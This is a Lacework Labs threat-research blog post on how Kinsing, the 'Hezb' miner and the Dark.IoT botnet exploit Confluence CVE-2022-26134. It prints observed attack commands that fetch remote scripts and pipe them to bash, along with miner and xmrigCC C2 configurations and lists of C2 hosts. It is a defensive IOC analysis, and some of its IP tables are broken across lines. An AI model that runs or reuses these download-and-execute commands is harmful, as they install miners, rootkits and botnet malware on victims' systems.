# Kinsing & Dark.IoT botnet among threats targeting CVE-2022-26134

**[lacework.com/blog/kinsing-dark-iot-botnet-among-threats-targeting-cve-2022-26134/](https://www.lacework.com/blog/kinsing-dark-iot-botnet-among-threats-targeting-cve-2022-26134/)**

Chris Hall - Cloud Security Researcher - Lacework Labs

June 7, 2022


June 7, 2022


-----

[Details regarding the recent Confluence OGNL (CVE-2022-26134) exploit were released to the public on June 3rd 2022.](https://www.lacework.com/blog/security-advisory-cve-2022-26134-rce-in-multiple-atlassian-products/)
Shortly following this, Lacework Labs began seeing multiple attacks in the wild from both uncategorized and named
[threats. While this was expected, there appears to be more widespread exploitation of CVE-2022-26134 compared to](https://www.lacework.com/blog/security-advisory-cve-2022-26134-rce-in-multiple-atlassian-products/)
[previous Confluence vulnerabilities.](https://www.cvedetails.com/vulnerability-list/vendor_id-3578/product_id-6258/Atlassian-Confluence.html)

As of this writing we have observed active exploitation by known Cloud threat malware families such as Kinsing, “Hezb”,
and the Dark.IoT botnet. This blog provides a current inventory of top threats seen exploiting this latest Confluence
vulnerability. [Additional IOCs associated with this vulnerability are included in our Github repo.](https://github.com/lacework/lacework-labs/blob/master/blog/CVE-2022-26134_IOCs.csv)

## Kinsing

[Kinsing is often one of the first threats to add a new exploit to their toolbox, and CVE-2022-26134 was no different. One](https://info.lacework.com/rs/016-ATL-295/images/lacework-cloud-threat-report-vol3.pdf)
interesting development was the use of a new malware host – 195.2.79.26 for the Kinsing installer. This is noteworthy
because Kinsing often leverages legacy infrastructure in their attacks. Observed payload commands for CVE-202226134:
```
/bin/sh -c wget -q -O - http://185.191.32.198/cf.sh | bash &amp;gt; /dev/null 2&amp;gt;&amp;amp;1
bash -c (curl -s 195.2.79.26/cf.sh||wget -q -O- 195.2.79.26/cf.sh)|bash

```
The initial payload cf.sh is currently not available on VirusTotal. However, it’s a typical installer which downloads and runs
[the Kinsing H2miner malware as well as a userland level rootkit via libsystem.so. This shared object in turn would be](https://www.virustotal.com/gui/file/5d2530b809fd069f97b30a5938d471dd2145341b5793a70656aad6045445cf6d)
[leveraged in LD_PRELOAD attacks (T1574.006).](https://attack.mitre.org/techniques/T1574/006/)

## Hezb


-----

Another threat, dubbed Hezb based on command line artifact data, was observed around Kinsing. This malware is
[relatively new and was recently reported in late May exploiting WSO2 RCE (CVE-2022-29464) in the wild. Several](https://www.trendmicro.com/en_us/research/22/e/patch-your-wso2-cve-2022-29464-exploited-to-install-linux-compatible-cobalt-strike-beacons-other-malware.html)
malware components were observed, the first of which was an XMRig miner installed as “Hezb”. Additional modules
included a polkit exploit for privilege escalation as well as a zero-detection ELF payload named “kik”. The following table
lists observed artifacts and descriptions.

CMDLINE artifacts Description

```
curl -o hezb http://202.28.229.174/sys.x86_64
hezb -o 199.247.0.216:80 -u 
46HmQz11t8uN84P8xgThrQXSYm434VC7hhNR8be4QrGtM1Wa4cDH2GkJ2NNXZ6Dr4bYg6phNjHKYJ1QfpZRBFYW5V6
qnRJN -p ap8 -k -B
bash -c curl 202.28.229.174/root.sh|bash
curl -o kik http://202.28.229.174/kik

```

Initial payload
command – XMRig

XMRig configuration
command. XMRig
username.
Username first seen
in [early May with](https://www.virustotal.com/gui/search/content%253A%252246HmQz11t8uN84P8xgThrQXSYm434VC7hhNR8be4QrGtM1Wa4cDH2GkJ2NNXZ6Dr4bYg6phNjHKYJ1QfpZRBFYW5V6qnRJN%2522/files)
various malware

Second stage
installer
Attempts to run [ap.sh](https://www.virustotal.com/gui/file/b0f4ad9535f4df8f5448c3c201449e24c974ffd25d7a3086caa2089d6527544d/content)
via polkit privilege
escalation
```
./ko -o dom
http://202.28.229.1
74/ko

```
Zero detection ELF
binary


Prior to the Hezb miner, another XMRig variant was observed and is believed to belong to the same group via shared
[infrastructure. This miner is a variant of xmrigCC which is a modified version of XMRig with C2 capabilities. Payload](https://github.com/Bendr0id/xmrigCC)
command:
```
curl http://134.213.29.14:32953/2/c2/java.tar.gz --output /var/tmp/java.tar.gz

```
Static configurations:


-----

```
 p [
 {
  "algo": null,
  "coin": null,
  "url": "91[.]217[.]81[.]162:443",
  "pass": "x",
  "rig-id": "con2022",
  "nicehash": false,
  "keepalive": false,
  "enabled": true,
  "tls": true,
  "tls-fingerprint": null,
  "daemon": false,
  "socks5": null,
  "self-select": null,
  "submit-to-origin": false
 }
],
"cc-client": {
 "enabled": true,
 "url": "91.217.81.162:80",
 "access-token": "sd893Lkhsdg81LKjgpqffss4KLjjsl",
 "use-tls": false,
 "use-remote-logging": true,
 "upload-config-on-start": true,
 "worker-id": null,
 "reboot-cmd": null,
 "update-interval-s": 60
},

```
**Privilege Escalation via pwnkit (binary name: ko)**

[CVE-2021-4034 released earlier this year resulted in privilege escalation via a bug in the SETUID application “polkit”. The](https://nvd.nist.gov/vuln/detail/CVE-2021-4034)
aptly named “pwnkit” exploit was observed being spread within droppers taking advantage of the most recent confluence
vulnerability.The image below shows the Ghidra decompilation for this utility, aligning to many of the public proof-ofconcept exploits that exist on Github for this vulnerability.


-----

Figure 1. Hezb component Ko

**Post Execution Payload – Kik**

Kik is a statically linked, non-stripped 64-bit Golang ELF binary. This binary attempts to match for specific values while
excluding others and pipes the resulting values to “kill -9”.This is executed in a while true loop printing out “command
executed successfully” to stdout.

Figure 2. Hezb component Kik

## Dark.IoT

A unique Mirai variant was also installed as “x” and was downloaded from host 136.144.41.171. Observed commands:
```
/bin/sh -c wget -q -O - 136.144.41.171/atl | sh &amp;gt; /dev/null 2&amp;gt;&amp;amp;1
 get 136 144 41 171/

```

-----

This [malware is characterized by alternative DNS connections and connects to several .lib domains using custom DNS](https://www.virustotal.com/gui/file/a2d3c868667e2b702c9894b297237247a9b106622e4b1be54cb068a7ba9fe08c/relations)
servers. The following observed DNS servers, hostnames and resolutions were observed:

C2 host DNS Servers Resolved IPs

```
tempest.l
ib
dragon.li
b
blacknurs
e.lib
babaroga.
lib

```
```
94.247.43.25
4
95.217.229.2
11
162.243.19.4
7
94.16.114.25
4
194.36.144.8
7
95.217.229.2
11
162.243.19.4
7
94.16.114.25
4
144.76.157.2
42
94.247.43.25
4
194.36.144.8
7
95.217.229.2
11
144.76.157.2
42
94.16.114.25
4
95.217.229.2
11
162.243.19.4
7
94.247.43.25
4

```
```
62.4.23.97
193.70.30.98
5.206.227.24
4
203.0.113.0

```

This set of Mirai activity was [reported in September 2021 targeting Realtek devices as part of the Dark.IoT botnet.](https://blogs.juniper.net/en-us/threat-research/attacks-continue-against-realtek-vulnerabilities)
Dark.IoT is a prolific botnet that has expanded its activity beyond targeting of IoT devices, for example with an Oracle
weblogic exploit and [targeting of Azure Open Management infrastructure.](https://twitter.com/0xrb/status/1440219730506174466)

Exploits involving Confluence are always popular among various threats including those targeting cloud. While Lacework
Labs observed a lot of activity relative to other exploits, there is still low exposure compared to the more impactful “coffee
break” vulnerabilities such as those involving log4j or apache. For a complete list of IoCs observed in CVE-2022-26134
[exploitation, refer to our Github. For more content like this, check us out on Twitter and](https://github.com/lacework/lacework-labs/blob/master/blog/CVE-2022-26134_IOCs.csv) [LinkedIn!](https://www.linkedin.com/showcase/lacework-labs)


-----